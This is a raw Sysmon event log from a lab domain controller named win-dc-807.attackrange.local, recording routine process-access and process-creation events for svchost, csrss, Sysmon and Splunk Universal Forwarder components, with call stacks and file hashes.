15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7D60-5FA1-7101-000000008801}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D60-5FA1-7101-000000008801}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.523{D28789B6-7D60-5FA1-7101-000000008801}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.882{D28789B6-7D61-5FA1-7201-000000008801}30644360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D61-5FA1-7201-000000008801}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D61-5FA1-7201-000000008801}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.741{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D61-5FA1-7201-000000008801}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:13.743{D28789B6-7D61-5FA1-7201-000000008801}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.679{D28789B6-7D62-5FA1-7301-000000008801}45002320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D62-5FA1-7301-000000008801}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 